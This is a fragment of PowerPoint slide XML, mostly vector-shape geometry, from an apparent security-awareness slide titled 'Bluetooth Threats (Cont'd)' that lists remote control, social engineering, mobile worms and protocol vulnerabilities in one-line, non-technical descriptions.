                  <a:pt x="431" y="269"/>
                  <a:pt x="431" y="269"/>
                  <a:pt x="431" y="269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="269"/>
                  <a:pt x="403" y="276"/>
                  <a:pt x="403" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="403" y="396"/>
                  <a:pt x="403" y="396"/>
                  <a:pt x="403" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="403" y="417"/>
                  <a:pt x="417" y="424"/>
                  <a:pt x="431" y="4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64" name="Freeform 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB8F8BF-BDE1-4EA8-A600-38A3C2C45B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65834" y="2453898"/>
            <a:ext cx="628658" cy="631590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 73816246 w 601"/>
              <a:gd name="T1" fmla="*/ 78678142 h 609"/>
              <a:gd name="T2" fmla="*/ 73816246 w 601"/>
              <a:gd name="T3" fmla="*/ 78678142 h 609"/>
              <a:gd name="T4" fmla="*/ 3613541 w 601"/>
              <a:gd name="T5" fmla="*/ 78678142 h 609"/>
              <a:gd name="T6" fmla="*/ 0 w 601"/>
              <a:gd name="T7" fmla="*/ 75054951 h 609"/>
              <a:gd name="T8" fmla="*/ 0 w 601"/>
              <a:gd name="T9" fmla="*/ 13716829 h 609"/>
              <a:gd name="T10" fmla="*/ 3613541 w 601"/>
              <a:gd name="T11" fmla="*/ 10093638 h 609"/>
              <a:gd name="T12" fmla="*/ 10840264 w 601"/>
              <a:gd name="T13" fmla="*/ 10093638 h 609"/>
              <a:gd name="T14" fmla="*/ 10840264 w 601"/>
              <a:gd name="T15" fmla="*/ 13716829 h 609"/>
              <a:gd name="T16" fmla="*/ 19099426 w 601"/>
              <a:gd name="T17" fmla="*/ 21998871 h 609"/>
              <a:gd name="T18" fmla="*/ 27229624 w 601"/>
              <a:gd name="T19" fmla="*/ 13716829 h 609"/>
              <a:gd name="T20" fmla="*/ 27229624 w 601"/>
              <a:gd name="T21" fmla="*/ 10093638 h 609"/>
              <a:gd name="T22" fmla="*/ 49167722 w 601"/>
              <a:gd name="T23" fmla="*/ 10093638 h 609"/>
              <a:gd name="T24" fmla="*/ 49167722 w 601"/>
              <a:gd name="T25" fmla="*/ 13716829 h 609"/>
              <a:gd name="T26" fmla="*/ 58330360 w 601"/>
              <a:gd name="T27" fmla="*/ 21998871 h 609"/>
              <a:gd name="T28" fmla="*/ 66460558 w 601"/>
              <a:gd name="T29" fmla="*/ 13716829 h 609"/>
              <a:gd name="T30" fmla="*/ 66460558 w 601"/>
              <a:gd name="T31" fmla="*/ 10093638 h 609"/>
              <a:gd name="T32" fmla="*/ 73816246 w 601"/>
              <a:gd name="T33" fmla="*/ 10093638 h 609"/>
              <a:gd name="T34" fmla="*/ 77429787 w 601"/>
              <a:gd name="T35" fmla="*/ 13716829 h 609"/>
              <a:gd name="T36" fmla="*/ 77429787 w 601"/>
              <a:gd name="T37" fmla="*/ 75054951 h 609"/>
              <a:gd name="T38" fmla="*/ 73816246 w 601"/>
              <a:gd name="T39" fmla="*/ 78678142 h 609"/>
              <a:gd name="T40" fmla="*/ 70203064 w 601"/>
              <a:gd name="T41" fmla="*/ 29245613 h 609"/>
              <a:gd name="T42" fmla="*/ 70203064 w 601"/>
              <a:gd name="T43" fmla="*/ 29245613 h 609"/>
              <a:gd name="T44" fmla="*/ 7226723 w 601"/>
              <a:gd name="T45" fmla="*/ 29245613 h 609"/>
              <a:gd name="T46" fmla="*/ 7226723 w 601"/>
              <a:gd name="T47" fmla="*/ 71302258 h 609"/>
              <a:gd name="T48" fmla="*/ 70203064 w 601"/>
              <a:gd name="T49" fmla="*/ 71302258 h 609"/>
              <a:gd name="T50" fmla="*/ 70203064 w 601"/>
              <a:gd name="T51" fmla="*/ 29245613 h 609"/>
              <a:gd name="T52" fmla="*/ 26326149 w 601"/>
              <a:gd name="T53" fmla="*/ 46585633 h 609"/>
              <a:gd name="T54" fmla="*/ 26326149 w 601"/>
              <a:gd name="T55" fmla="*/ 46585633 h 609"/>
              <a:gd name="T56" fmla="*/ 29165180 w 601"/>
              <a:gd name="T57" fmla="*/ 47491791 h 609"/>
              <a:gd name="T58" fmla="*/ 34585312 w 601"/>
              <a:gd name="T59" fmla="*/ 53961878 h 609"/>
              <a:gd name="T60" fmla="*/ 49167722 w 601"/>
              <a:gd name="T61" fmla="*/ 39339251 h 609"/>
              <a:gd name="T62" fmla="*/ 51877788 w 601"/>
              <a:gd name="T63" fmla="*/ 38433453 h 609"/>
              <a:gd name="T64" fmla="*/ 55620295 w 601"/>
              <a:gd name="T65" fmla="*/ 42056644 h 609"/>
              <a:gd name="T66" fmla="*/ 54716819 w 601"/>
              <a:gd name="T67" fmla="*/ 43868240 h 609"/>
              <a:gd name="T68" fmla="*/ 37295378 w 601"/>
              <a:gd name="T69" fmla="*/ 61338122 h 609"/>
              <a:gd name="T70" fmla="*/ 34585312 w 601"/>
              <a:gd name="T71" fmla="*/ 62243920 h 609"/>
              <a:gd name="T72" fmla="*/ 32778721 w 601"/>
              <a:gd name="T73" fmla="*/ 61338122 h 609"/>
              <a:gd name="T74" fmla="*/ 23616083 w 601"/>
              <a:gd name="T75" fmla="*/ 53056080 h 609"/>
              <a:gd name="T76" fmla="*/ 22712608 w 601"/>
              <a:gd name="T77" fmla="*/ 50338687 h 609"/>
              <a:gd name="T78" fmla="*/ 26326149 w 601"/>
              <a:gd name="T79" fmla="*/ 46585633 h 609"/>
              <a:gd name="T80" fmla="*/ 58330360 w 601"/>
              <a:gd name="T81" fmla="*/ 17340380 h 609"/>
              <a:gd name="T82" fmla="*/ 58330360 w 601"/>
              <a:gd name="T83" fmla="*/ 17340380 h 609"/>
              <a:gd name="T84" fmla="*/ 54716819 w 601"/>
              <a:gd name="T85" fmla="*/ 13716829 h 609"/>
              <a:gd name="T86" fmla="*/ 54716819 w 601"/>
              <a:gd name="T87" fmla="*/ 3623191 h 609"/>
              <a:gd name="T88" fmla="*/ 58330360 w 601"/>
              <a:gd name="T89" fmla="*/ 0 h 609"/>
              <a:gd name="T90" fmla="*/ 61943901 w 601"/>
              <a:gd name="T91" fmla="*/ 3623191 h 609"/>
              <a:gd name="T92" fmla="*/ 61943901 w 601"/>
              <a:gd name="T93" fmla="*/ 13716829 h 609"/>
              <a:gd name="T94" fmla="*/ 58330360 w 601"/>
              <a:gd name="T95" fmla="*/ 17340380 h 609"/>
              <a:gd name="T96" fmla="*/ 19099426 w 601"/>
              <a:gd name="T97" fmla="*/ 17340380 h 609"/>
              <a:gd name="T98" fmla="*/ 19099426 w 601"/>
              <a:gd name="T99" fmla="*/ 17340380 h 609"/>
              <a:gd name="T100" fmla="*/ 15485886 w 601"/>
              <a:gd name="T101" fmla="*/ 13716829 h 609"/>
              <a:gd name="T102" fmla="*/ 15485886 w 601"/>
              <a:gd name="T103" fmla="*/ 3623191 h 609"/>
              <a:gd name="T104" fmla="*/ 19099426 w 601"/>
              <a:gd name="T105" fmla="*/ 0 h 609"/>
              <a:gd name="T106" fmla="*/ 22712608 w 601"/>
              <a:gd name="T107" fmla="*/ 3623191 h 609"/>
              <a:gd name="T108" fmla="*/ 22712608 w 601"/>
              <a:gd name="T109" fmla="*/ 13716829 h 609"/>
              <a:gd name="T110" fmla="*/ 19099426 w 601"/>
              <a:gd name="T111" fmla="*/ 17340380 h 60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01" h="609">
                <a:moveTo>
                  <a:pt x="572" y="608"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="572" y="608"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="608"/>
                  <a:pt x="28" y="608"/>
                  <a:pt x="28" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="608"/>
                  <a:pt x="0" y="594"/>
                  <a:pt x="0" y="580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92"/>
                  <a:pt x="7" y="78"/>
                  <a:pt x="28" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="78"/>
                  <a:pt x="84" y="78"/>
                  <a:pt x="84" y="78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84" y="141"/>
                  <a:pt x="113" y="170"/>
                  <a:pt x="148" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="170"/>
                  <a:pt x="211" y="141"/>
                  <a:pt x="211" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="78"/>
                  <a:pt x="211" y="78"/>
                  <a:pt x="211" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="78"/>
                  <a:pt x="381" y="78"/>
                  <a:pt x="381" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="106"/>
                  <a:pt x="381" y="106"/>
                  <a:pt x="381" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="141"/>
                  <a:pt x="417" y="170"/>
                  <a:pt x="452" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="487" y="170"/>
                  <a:pt x="515" y="141"/>
                  <a:pt x="515" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="515" y="78"/>
                  <a:pt x="515" y="78"/>
                  <a:pt x="515" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="572" y="78"/>
                  <a:pt x="572" y="78"/>
                  <a:pt x="572" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="586" y="78"/>
                  <a:pt x="600" y="92"/>
                  <a:pt x="600" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="600" y="580"/>
                  <a:pt x="600" y="580"/>
                  <a:pt x="600" y="580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="600" y="594"/>
                  <a:pt x="586" y="608"/>
                  <a:pt x="572" y="608"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="544" y="226"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="544" y="226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="226"/>
                  <a:pt x="56" y="226"/>
                  <a:pt x="56" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="551"/>
                  <a:pt x="56" y="551"/>
                  <a:pt x="56" y="551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="544" y="551"/>
                  <a:pt x="544" y="551"/>
                  <a:pt x="544" y="551"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="544" y="226"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="204" y="360"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="204" y="360"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="360"/>
                  <a:pt x="219" y="360"/>
                  <a:pt x="226" y="367"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="417"/>
                  <a:pt x="268" y="417"/>
                  <a:pt x="268" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="304"/>
                  <a:pt x="381" y="304"/>
                  <a:pt x="381" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="388" y="297"/>
                  <a:pt x="395" y="297"/>
                  <a:pt x="402" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="297"/>
                  <a:pt x="431" y="304"/>
                  <a:pt x="431" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="431" y="332"/>
                  <a:pt x="431" y="339"/>
                  <a:pt x="424" y="339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="474"/>
                  <a:pt x="289" y="474"/>
                  <a:pt x="289" y="474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="282" y="481"/>
                  <a:pt x="275" y="481"/>
                  <a:pt x="268" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="481"/>
                  <a:pt x="254" y="481"/>
                  <a:pt x="254" y="474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="410"/>
                  <a:pt x="183" y="410"/>
                  <a:pt x="183" y="410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="403"/>
                  <a:pt x="176" y="396"/>
                  <a:pt x="176" y="389"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="375"/>
                  <a:pt x="190" y="360"/>
                  <a:pt x="204" y="360"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="452" y="134"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="452" y="134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="431" y="134"/>
                  <a:pt x="424" y="120"/>
                  <a:pt x="424" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="424" y="28"/>
                  <a:pt x="424" y="28"/>
                  <a:pt x="424" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="424" y="14"/>
                  <a:pt x="431" y="0"/>
                  <a:pt x="452" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="466" y="0"/>
                  <a:pt x="480" y="14"/>
                  <a:pt x="480" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="106"/>
                  <a:pt x="480" y="106"/>
                  <a:pt x="480" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="120"/>
                  <a:pt x="466" y="134"/>
                  <a:pt x="452" y="134"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="148" y="134"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="148" y="134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134" y="134"/>
                  <a:pt x="120" y="120"/>
                  <a:pt x="120" y="106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120" y="14"/>
                  <a:pt x="134" y="0"/>
                  <a:pt x="148" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="0"/>
                  <a:pt x="176" y="14"/>
                  <a:pt x="176" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="106"/>
                  <a:pt x="176" y="106"/>
                  <a:pt x="176" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="120"/>
                  <a:pt x="162" y="134"/>
                  <a:pt x="148" y="13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31971276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13AA655-BCA8-4269-8D1F-68F570047712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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Bluetooth Threats (Cont’d)</a:t>
            </a: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71761C09-A991-40AA-94F7-2075D0A5E3E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787692" y="1171575"/>
            <a:ext cx="2090943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Remote Control</a:t>
            </a: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9A2375D7-BEB5-43B5-AB6B-2073B4309C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561975" y="1591831"/>
            <a:ext cx="3316660" cy="92333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Hackers can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remotely control a phone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to make phone calls or connect to the Internet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98932C81-939F-464F-B1DC-063CBA0C4F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318488" y="1171575"/>
            <a:ext cx="2340064" cy="3693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Social Engineering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CDF121AC-E189-433E-B16C-32A8D8968EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318488" y="1591831"/>
            <a:ext cx="3111512" cy="147732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Attackers trick Bluetooth users to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lower security or disable authentication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for Bluetooth connections to pair with them, thereby stealing information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882E8928-5179-409D-95CC-F510DE3D86CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901812" y="4302457"/>
            <a:ext cx="1976823" cy="3693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Malicious Code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46AA9B57-05AC-4733-9138-AC9A511DA2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561975" y="4694872"/>
            <a:ext cx="3316660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Mobile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phone worms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can exploit a Bluetooth connection to replicate and spread itself</a:t>
            </a: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E53E16F0-423A-453A-97D1-AF88B5D73754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318488" y="4302457"/>
            <a:ext cx="2863476" cy="3693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Protocol Vulnerabilities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30B1F689-C59B-4BB9-AD32-2DB588772801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318488" y="4694872"/>
            <a:ext cx="3644912" cy="147732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Attackers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exploit Bluetooth pairings and communication protocols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to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.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BB5F449-9D81-4865-8998-7FF1B584960F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4017183" y="1606443"/>
            <a:ext cx="4157634" cy="3906377"/>
            <a:chOff x="3917091" y="1606443"/>
            <a:chExt cx="4157634" cy="3906377"/>
          </a:xfrm>
        </p:grpSpPr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81A34724-AD52-4988-9DAB-2B54EF0118E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3917091" y="4012715"/>
              <a:ext cx="1500105" cy="1500105"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:alpha val="90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22860" rIns="45720" bIns="228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/>
              <a:endParaRPr lang="en-US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0F457D07-7C23-45C2-B286-2DA6B8569DDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6574620" y="4012715"/>
              <a:ext cx="1500105" cy="1500105"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:alpha val="90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22860" rIns="45720" bIns="228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/>
              <a:endParaRPr lang="en-US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8B6C9AA0-BCF2-4B36-A3B2-FDDE6421364B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3917091" y="1606443"/>
              <a:ext cx="1500105" cy="1500105"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="90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22860" rIns="45720" bIns="228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/>
              <a:endParaRPr lang="en-US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007F0E50-6FD6-402F-ACD6-3CDC557B62B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6574620" y="1606443"/>
              <a:ext cx="1500105" cy="1500105"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:alpha val="89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22860" rIns="45720" bIns="228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/>
              <a:endParaRPr lang="en-US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57880306-12C4-486D-A2CA-D4A9008921AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4768139" y="2331165"/>
              <a:ext cx="2415936" cy="2415935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22860" rIns="45720" bIns="2286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/>
              <a:endParaRPr lang="en-US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aphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="45" name="Chart 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0870A2C-E0B2-4E5E-BD68-57BE6A43E8D1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1641385106"/>
                </p:ext>
              </p:extLst>
            </p:nvPr>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4804492" y="2455282"/>
            <a:ext cx="2358873" cy="2143303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59" name="Freeform 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C038DE9C-A6D3-45B6-B8B5-06C97A6F2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300" y="1903792"/>
              <a:ext cx="530619" cy="735347"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106806 w 283"/>
                <a:gd name="T1" fmla="*/ 0 h 489"/>
                <a:gd name="T2" fmla="*/ 106806 w 283"/>
                <a:gd name="T3" fmla="*/ 0 h 489"/>
                <a:gd name="T4" fmla="*/ 19746 w 283"/>
                <a:gd name="T5" fmla="*/ 0 h 489"/>
                <a:gd name="T6" fmla="*/ 0 w 283"/>
                <a:gd name="T7" fmla="*/ 19712 h 489"/>
                <a:gd name="T8" fmla="*/ 0 w 283"/>
                <a:gd name="T9" fmla="*/ 194435 h 489"/>
                <a:gd name="T10" fmla="*/ 19746 w 283"/>
                <a:gd name="T11" fmla="*/ 218627 h 489"/>
                <a:gd name="T12" fmla="*/ 106806 w 283"/>
                <a:gd name="T13" fmla="*/ 218627 h 489"/>
                <a:gd name="T14" fmla="*/ 126551 w 283"/>
                <a:gd name="T15" fmla="*/ 194435 h 489"/>
                <a:gd name="T16" fmla="*/ 126551 w 283"/>
                <a:gd name="T17" fmla="*/ 19712 h 489"/>
                <a:gd name="T18" fmla="*/ 106806 w 283"/>
                <a:gd name="T19" fmla="*/ 0 h 489"/>
                <a:gd name="T20" fmla="*/ 63276 w 283"/>
                <a:gd name="T21" fmla="*/ 206083 h 489"/>
                <a:gd name="T22" fmla="*/ 63276 w 283"/>
                <a:gd name="T23" fmla="*/ 206083 h 489"/>
                <a:gd name="T24" fmla="*/ 47569 w 283"/>
                <a:gd name="T25" fmla="*/ 198467 h 489"/>
                <a:gd name="T26" fmla="*/ 63276 w 283"/>
                <a:gd name="T27" fmla="*/ 186371 h 489"/>
                <a:gd name="T28" fmla="*/ 78982 w 283"/>
                <a:gd name="T29" fmla="*/ 198467 h 489"/>
                <a:gd name="T30" fmla="*/ 63276 w 283"/>
                <a:gd name="T31" fmla="*/ 206083 h 489"/>
                <a:gd name="T32" fmla="*/ 110845 w 283"/>
                <a:gd name="T33" fmla="*/ 174722 h 489"/>
                <a:gd name="T34" fmla="*/ 110845 w 283"/>
                <a:gd name="T35" fmla="*/ 174722 h 489"/>
                <a:gd name="T36" fmla="*/ 15707 w 283"/>
                <a:gd name="T37" fmla="*/ 174722 h 489"/>
                <a:gd name="T38" fmla="*/ 15707 w 283"/>
                <a:gd name="T39" fmla="*/ 27776 h 489"/>
                <a:gd name="T40" fmla="*/ 110845 w 283"/>
                <a:gd name="T41" fmla="*/ 27776 h 489"/>
                <a:gd name="T42" fmla="*/ 110845 w 283"/>
                <a:gd name="T43" fmla="*/ 174722 h 4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83" h="489">
                  <a:moveTo>
                    <a:pt x="238" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="238" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="0"/>
                    <a:pt x="44" y="0"/>
                    <a:pt x="44" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="0" y="18"/>
                    <a:pt x="0" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="0" y="434"/>
                    <a:pt x="0" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="460"/>
                    <a:pt x="17" y="488"/>
                    <a:pt x="44" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="488"/>
                    <a:pt x="238" y="488"/>
                    <a:pt x="238" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="488"/>
                    <a:pt x="282" y="460"/>
                    <a:pt x="282" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="44"/>
                    <a:pt x="282" y="44"/>
                    <a:pt x="282" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="18"/>
                    <a:pt x="265" y="0"/>
                    <a:pt x="238" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="141" y="460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="141" y="460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="460"/>
                    <a:pt x="106" y="451"/>
                    <a:pt x="106" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="425"/>
                    <a:pt x="123" y="416"/>
                    <a:pt x="141" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="416"/>
                    <a:pt x="176" y="425"/>
                    <a:pt x="176" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="451"/>
                    <a:pt x="159" y="460"/>
                    <a:pt x="141" y="460"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="247" y="390"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247" y="390"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="390"/>
                    <a:pt x="35" y="390"/>
                    <a:pt x="35" y="390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247" y="62"/>
                    <a:pt x="247" y="62"/>
                    <a:pt x="247" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="247" y="39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60" name="Freeform 161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EBA0F7A-AD48-41AC-84AE-C4D377F36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1432" y="1902819"/>
              <a:ext cx="792580" cy="737292"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215449 w 479"/>
                <a:gd name="T1" fmla="*/ 175196 h 417"/>
                <a:gd name="T2" fmla="*/ 215449 w 479"/>
                <a:gd name="T3" fmla="*/ 175196 h 417"/>
                <a:gd name="T4" fmla="*/ 115838 w 479"/>
                <a:gd name="T5" fmla="*/ 0 h 417"/>
                <a:gd name="T6" fmla="*/ 107725 w 479"/>
                <a:gd name="T7" fmla="*/ 0 h 417"/>
                <a:gd name="T8" fmla="*/ 99611 w 479"/>
                <a:gd name="T9" fmla="*/ 0 h 417"/>
                <a:gd name="T10" fmla="*/ 0 w 479"/>
                <a:gd name="T11" fmla="*/ 175196 h 417"/>
                <a:gd name="T12" fmla="*/ 0 w 479"/>
                <a:gd name="T13" fmla="*/ 183282 h 417"/>
                <a:gd name="T14" fmla="*/ 7662 w 479"/>
                <a:gd name="T15" fmla="*/ 186876 h 417"/>
                <a:gd name="T16" fmla="*/ 207787 w 479"/>
                <a:gd name="T17" fmla="*/ 186876 h 417"/>
                <a:gd name="T18" fmla="*/ 215449 w 479"/>
                <a:gd name="T19" fmla="*/ 183282 h 417"/>
                <a:gd name="T20" fmla="*/ 215449 w 479"/>
                <a:gd name="T21" fmla="*/ 175196 h 417"/>
                <a:gd name="T22" fmla="*/ 119444 w 479"/>
                <a:gd name="T23" fmla="*/ 167110 h 417"/>
                <a:gd name="T24" fmla="*/ 119444 w 479"/>
                <a:gd name="T25" fmla="*/ 167110 h 417"/>
                <a:gd name="T26" fmla="*/ 95555 w 479"/>
                <a:gd name="T27" fmla="*/ 167110 h 417"/>
                <a:gd name="T28" fmla="*/ 95555 w 479"/>
                <a:gd name="T29" fmla="*/ 143301 h 417"/>
                <a:gd name="T30" fmla="*/ 119444 w 479"/>
                <a:gd name="T31" fmla="*/ 143301 h 417"/>
